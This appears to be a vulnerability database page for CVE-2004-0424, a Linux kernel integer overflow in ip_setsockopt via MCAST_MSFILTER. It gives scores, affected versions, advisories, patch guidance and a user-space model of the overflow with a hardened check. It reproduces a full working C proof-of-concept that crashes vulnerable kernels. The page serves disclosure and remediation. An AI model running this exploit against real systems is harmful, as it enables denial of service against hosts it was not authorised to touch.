CVE-2004-0424
CVSS 7.2
Published: 2004-07-07 00:00:00
Revised: 2016-10-17 22:45:17

[Original] Integer overflow in the ip_setsockopt function in Linux kernel 2.4.22 through 2.4.25 and 2.6.1 through 2.6.3 allows local users to cause a denial of service (crash) or execute arbitrary code via the MCAST_MSFILTER socket option.


[CNNVD] Linux Kernel Setsockopt MCAST_MSFILTER Integer Overflow Vulnerability (CNNVD-200407-013)

        The ip_setsockopt function in Linux kernel 2.4.22 through 2.4.25 and 2.6.1 through 2.6.3 contains an integer overflow. A local user can use the MCAST_MSFILTER socket option to cause a denial of service (crash) or execute arbitrary code.

- CVSS (Base Score)

CVSS score: 7.2 [HIGH]
Confidentiality impact: COMPLETE [total information disclosure; all system files exposed]
Integrity impact: COMPLETE [system integrity can be completely compromised]
Availability impact: COMPLETE [can result in complete system shutdown]
Access complexity: LOW [no special access conditions required]
Access vector: LOCAL [exploitation requires physical access or a local account]
Authentication: NONE [no authentication required]

- CPE (Affected platforms and products)

cpe:/o:slackware:slackware_linux:9.1    Slackware Linux 9.1
cpe:/o:linux:linux_kernel:2.4.24_ow1
cpe:/o:linux:linux_kernel:2.6.1:rc2    Linux Kernel 2.6.1 Release Candidate 2
cpe:/o:linux:linux_kernel:2.6.1:rc1    Linux Kernel 2.6.1 Release Candidate 1
cpe:/o:linux:linux_kernel:2.4.23    Linux Kernel 2.4.23
cpe:/o:linux:linux_kernel:2.4.22    Linux Kernel 2.4.22
cpe:/o:linux:linux_kernel:2.4.23_ow2
cpe:/o:linux:linux_kernel:2.4.25    Linux Kernel 2.4.25
cpe:/o:linux:linux_kernel:2.4.24    Linux Kernel 2.4.24
cpe:/o:linux:linux_kernel:2.6.3    Linux Kernel 2.6.3
cpe:/o:linux:linux_kernel:2.6.2    Linux Kernel 2.6.2
cpe:/a:sgi:propack:3.0    SGI ProPack 3.0
cpe:/o:linux:linux_kernel:2.6.1    Linux Kernel 2.6.1
cpe:/o:slackware:slackware_linux:current
cpe:/o:linux:linux_kernel:2.4.23:pre9    Linux Kernel 2.4.23 pre9

- OVAL (Technical details for detection)

oval:org.mitre.oval:def:939    Linux Kernel ip_setsockopt Integer Overflow
oval:org.mitre.oval:def:11214    Integer overflow in the ip_setsockopt function in Linux kernel 2.4.22 through 2.4.25 and 2.6.1 through 2.6.3 allows local users to cause a d...
*OVAL describes in detail how to detect this vulnerability; see the related OVAL definitions for more technical detail on detection.

- Official database links

http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2004-0424
(Official data source) MITRE
http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2004-0424
(Official data source) NVD
http://www.cnnvd.org.cn/vulnerability/show/cv_cnnvdid/CNNVD-200407-013
(Official data source) CNNVD

- Other links and resources

ftp://patches.sgi.com/support/free/security/advisories/20040504-01-U.asc
(UNKNOWN)  SGI  20040504-01-U
http://distro.conectiva.com.br/atualizacoes/?id=a&anuncio=000852
(UNKNOWN)  CONECTIVA  CLA-2004:852
http://marc.info/?l=bugtraq&m=108253171301153&w=2
(UNKNOWN)  BUGTRAQ  20040420 Linux kernel setsockopt MCAST_MSFILTER integer overflow
http://www.isec.pl/vulnerabilities/isec-0015-msfilter.txt
(VENDOR_ADVISORY)  MISC  http://www.isec.pl/vulnerabilities/isec-0015-msfilter.txt
http://www.linuxsecurity.com/advisories/engarde_advisory-4285.html
(VENDOR_ADVISORY)  ENGARDE  ESA-20040428-004
http://www.mandriva.com/security/advisories?name=MDKSA-2004:037
(UNKNOWN)  MANDRAKE  MDKSA-2004:037
http://www.novell.com/linux/security/advisories/2004_10_kernel.html
(UNKNOWN)  SUSE  SuSE-SA:2004:010
http://www.redhat.com/support/errata/RHSA-2004-183.html
(UNKNOWN)  REDHAT  RHSA-2004:183
http://www.securityfocus.com/bid/10179
(VENDOR_ADVISORY)  BID  10179
http://www.slackware.com/security/viewer.php?l=slackware-security&y=2004&m=slackware-security.659586
(UNKNOWN)  SLACKWARE  SSA:2004-119
http://xforce.iss.net/xforce/xfdb/15907
(VENDOR_ADVISORY)  XF  linux-ipsetsockopt-integer-bo(15907)

- Vulnerability information

Linux Kernel Setsockopt MCAST_MSFILTER Integer Overflow Vulnerability
High    Buffer overflow
2004-07-07 00:00:00    2005-10-20 00:00:00
Local
        The ip_setsockopt function in Linux kernel 2.4.22 through 2.4.25 and 2.6.1 through 2.6.3 contains an integer overflow. A local user can use the MCAST_MSFILTER socket option to cause a denial of service (crash) or execute arbitrary code.

- Advisories and patches

        This issue has been addressed in the 2.4.26 and 2.6.4 kernel releases. Please see the references for more information.
        Linux kernel 2.4.22

- Vulnerability information (274)

Linux Kernel <= 2.6.3 (setsockopt) Local Denial of Service Exploit (EDBID:274)
linux dos
2004-04-21 Verified
0 Julien Tinnes
/* setsockopt proof of concept code by Julien TINNES (julien a.t cr0.org)
 * vulnerability found (as always) by Paul Starzetz
 *
 * This is only a lame POC which will crash the machine, no root shell here.
 * Maybe later, when everybody will have an updated box.
 *
 * It should work on 2.6.1, 2.6.2 and 2.6.3 kernels.
 *
 * Greets to Christophe Devine, too bad you weren't with me for this one.
 */

#include <stdio.h>
#include <stdlib.h>
#include <errno.h>
#include <sys/types.h>
#include <sys/socket.h>
#include <linux/in.h>
#include <linux/socket.h>

#ifndef SOL_IP
#define SOL_IP 0
#endif
#ifndef MCAST_MSFILTER
#define MCAST_MSFILTER 48
#endif

/* mynumsrc and alloc_room control the overflow.
 * What we write can be controlled too (not needed
 * here but needed for a rootshell exploit).
 */

#define mynumsrc 0x100 /* 0x100 should be enough, can be tweaked */
#define alloc_room 1   /* let it allocate only one u32 */

/* Same layout as the kernel's struct group_filter, but with a fixed
 * number of source slots so the whole request fits on the stack. */
struct mygroup_filter
{
  __u32 gf_interface;                         /* interface index */
  struct sockaddr_storage gf_group;           /* multicast address */
  __u32 gf_fmode;                             /* filter mode */
  __u32 gf_numsrc;                            /* number of sources */
  struct sockaddr_storage gf_slist[mynumsrc]; /* source list */
};

int
main (void)
{
  int mysocket;
  int sockprot;
  struct mygroup_filter mygroup;
  int optlen;
  int i;
  struct sockaddr_in *psin;

  mygroup.gf_interface = 0;
  /* Huge source count: the kernel's size computation wraps so that only
   * alloc_room u32 slots are allocated, while the copy loop still walks
   * gf_numsrc entries. */
  mygroup.gf_numsrc = (1 << 30) - 4 + alloc_room;

  mygroup.gf_group.ss_family = AF_INET;

  /* Mark every source entry we actually supply as AF_INET. */
  for (i = 0; i < mynumsrc; i++)
    {
      psin = (struct sockaddr_in *) &mygroup.gf_slist[i];
      psin->sin_family = AF_INET;
    }

  mysocket = socket (PF_INET, SOCK_STREAM, 0);
  if (mysocket == -1)
    {
      perror ("Socket creation error: ");
      exit (1);
    }

  /* optlen covers the header plus mynumsrc slots; gf_numsrc claims far more. */
  optlen = sizeof (struct mygroup_filter);

  printf ("Calling setsockopt(), this should crash the box...\n");
  sockprot = setsockopt (mysocket, SOL_IP, MCAST_MSFILTER, &mygroup, optlen);

  if (sockprot == -1)
    {
      perror ("Invalid setsockopt: ");
      exit (1);
    }

  return 0;
}




// milw0rm.com [2004-04-21]
		

- Vulnerability information

5547
Linux Kernel ip_setsockopt MCAST_MSFILTER macro Overflow
Local Access Required Input Manipulation, Race Condition
Loss of Integrity, Loss of Availability
Exploit Public

- Vulnerability description

The Linux kernel contains a flaw that may allow a local denial of service. The issue is triggered when handling the MCAST_MSFILTER socket option in ip_setsockopt() in the net/ipv4/ip_sockglue.c source file. This flaw may allow a local attacker to cause an integer overflow and crash the system or execute arbitrary code, resulting in loss of integrity and availability.

- Timeline

2004-04-20 Unknown
2004-04-20 Unknown

- Solution

Upgrade to version 2.4.26 or 2.6.4 or higher, as it has been reported to fix this vulnerability. An upgrade is required as there are no known workarounds.

- Related references

- Vulnerability author

Unknown or Incomplete

- Vulnerability information

Linux Kernel Setsockopt MCAST_MSFILTER Integer Overflow Vulnerability
Class: Boundary Condition Error    Bugtraq ID: 10179
Remote: No    Local: Yes
Published: 2004-04-20 12:00:00    Updated: 2007-05-25 11:21:00
Paul Starzetz is credited with initial discovery and Wojciech Purczynski is credited with followup research.

- Affected program versions

Slackware Linux 9.1
Slackware Linux -current
SGI ProPack 3.0
Linux kernel 2.6.3
Linux kernel 2.6.2
Linux kernel 2.6.1 -rc2
Linux kernel 2.6.1 -rc1
Linux kernel 2.6.1
Linux kernel 2.4.25
Linux kernel 2.4.24 -ow1
Linux kernel 2.4.24
Linux kernel 2.4.23 -pre9
Linux kernel 2.4.23 -ow2
Linux kernel 2.4.23
+ Trustix Secure Linux 2.0
Linux kernel 2.4.22
+ Devil-Linux Devil-Linux 1.0.5
+ Devil-Linux Devil-Linux 1.0.4
+ Mandriva Linux Mandrake 9.2 amd64
+ Mandriva Linux Mandrake 9.2
+ Red Hat Fedora Core1
+ Slackware Linux 9.1

- Unaffected program versions

Linux kernel 2.6.5
+ S.u.S.E. Linux Enterprise Server 9
+ S.u.S.E. Linux Personal 9.1 x86_64
+ S.u.S.E. Linux Personal 9.1
Linux kernel 2.6.4
Linux kernel 2.4.26

- Vulnerability discussion

An integer-overflow vulnerability has been reported in the 'setsockopt()' system call. It was introduced in the 2.4.22 and 2.6.1 kernel releases.

The specific issue resides in the 'net/ipv4/ip_sockglue.c' source file, in the 'ip_setsockopt()' subroutine reached through the 'setsockopt()' system call. When the MCAST_MSFILTER socket option is set, the number of multicast sources supplied by the caller is fed into the IP_MSFILTER_SIZE macro to compute an allocation size; a sufficiently large count makes that computation wrap, so the kernel allocates a buffer far smaller than the source list it then copies into it.

A local attacker may exploit this issue to crash the system or to execute arbitrary code in kernel context and compromise the host. Note that this type of vulnerability can provide a generic means of privilege escalation across Linux distributions once a remote attacker has gained unauthorized access as a lower-privileged user.
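The size computation described above, modelled in user space as an added example; this is not kernel code and not part of the advisory or the PoC. The struct below mirrors the field layout of the kernel's struct ip_msfilter (four 32-bit header fields plus one inline source slot), the vulnerable function evaluates the IP_MSFILTER_SIZE expression in 32-bit arithmetic as a 32-bit kernel of that era would, and the 64-entry limit passed to the hardened variant is an assumed policy value, not the kernel's real constant:

```c
/* Added example: models the IP_MSFILTER_SIZE integer overflow in user space.
 * Not kernel code and not from the advisory. The struct mirrors the layout
 * of the kernel's struct ip_msfilter; the 32-bit arithmetic models a 32-bit
 * kernel. max_numsrc is an assumed limit, not the kernel's actual constant. */
#include <stdbool.h>
#include <stddef.h>
#include <stdint.h>
#include <stdio.h>

/* Same layout as the kernel's struct ip_msfilter: 20 bytes in total. */
struct ip_msfilter_model {
    uint32_t imsf_multiaddr;
    uint32_t imsf_interface;
    uint32_t imsf_fmode;
    uint32_t imsf_numsrc;
    uint32_t imsf_slist[1];
};

/* Header bytes excluding the one inline slot: sizeof(struct) - sizeof(u32) = 16 */
#define MSF_HEADER_BYTES (sizeof(struct ip_msfilter_model) - sizeof(uint32_t))

/* Vulnerable size computation: sizeof(struct ip_msfilter) - sizeof(__u32)
 * + numsrc * sizeof(__u32), evaluated in 32 bits. numsrc is the
 * attacker-controlled gf_numsrc from the user buffer, so the arithmetic can
 * wrap and yield a tiny allocation size. */
uint32_t msfilter_size_vulnerable(uint32_t numsrc)
{
    uint32_t header = (uint32_t)MSF_HEADER_BYTES;
    return header + numsrc * (uint32_t)sizeof(uint32_t);
}

/* Bytes the copy loop over gf_numsrc entries actually writes, computed
 * without wrapping, to show the gap between allocation and write. */
uint64_t msfilter_loop_bytes(uint32_t numsrc)
{
    return (uint64_t)numsrc * sizeof(uint32_t);
}

/* Hardened size computation: bound the count before multiplying and check
 * that the arithmetic fits, so the allocation always covers the loop. */
bool msfilter_size_checked(uint32_t numsrc, uint32_t max_numsrc, size_t *out)
{
    size_t header = MSF_HEADER_BYTES;
    if (numsrc > max_numsrc)
        return false; /* policy limit on source entries (assumed value) */
    if (numsrc > (SIZE_MAX - header) / sizeof(uint32_t))
        return false; /* header + numsrc * 4 would not fit in size_t */
    *out = header + (size_t)numsrc * sizeof(uint32_t);
    return true;
}

/* Convenience wrapper: checked size, or 0 when the request is rejected. */
size_t msfilter_size_or_zero(uint32_t numsrc, uint32_t max_numsrc)
{
    size_t n = 0;
    return msfilter_size_checked(numsrc, max_numsrc, &n) ? n : 0;
}

int main(void)
{
    /* The PoC uses gf_numsrc = (1 << 30) - 4 + alloc_room with alloc_room = 1. */
    uint32_t numsrc = (1u << 30) - 4 + 1;

    printf("numsrc = %u\n", numsrc);
    printf("vulnerable size: %u bytes allocated\n", msfilter_size_vulnerable(numsrc));
    printf("copy loop would write: %llu bytes\n",
           (unsigned long long)msfilter_loop_bytes(numsrc));
    printf("hardened size (limit 64): %zu (0 = rejected with EINVAL)\n",
           msfilter_size_or_zero(numsrc, 64));
    printf("hardened size for 3 sources: %zu bytes\n", msfilter_size_or_zero(3, 64));
    return 0;
}
```

With the PoC's count, the vulnerable expression evaluates to 4 bytes (exactly alloc_room u32 slots, as the PoC comment promises) while the loop would write roughly 4 GiB; the hardened variant rejects the count before any size is computed.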

- Exploit

A working exploit has been developed by one of the individuals who researched this vulnerability. This exploit is not publicly available or known to be circulating in the wild.

The following proof-of-concept and exploit codes are available:

- Solution

This issue has been addressed in the 2.4.26 and 2.6.4 kernel releases. Please see the references for more information.

Linux kernel 2.4.22
Linux kernel 2.4.23 -pre9
Linux kernel 2.4.23 -ow2
Linux kernel 2.4.23
Linux kernel 2.4.24 -ow1
Linux kernel 2.4.24
Linux kernel 2.4.25
Linux kernel 2.6.1 -rc2
Linux kernel 2.6.1 -rc1
Linux kernel 2.6.2
Linux kernel 2.6.3

- Related references


About the SCAP Chinese Community

The SCAP Chinese Community is the first open Chinese-language community in China devoted to SCAP. For more information, see the About page.

Copyright notice

CVE, CWE and OVAL are registered trademarks of the MITRE Corporation; their official data sources are maintained on MITRE's websites.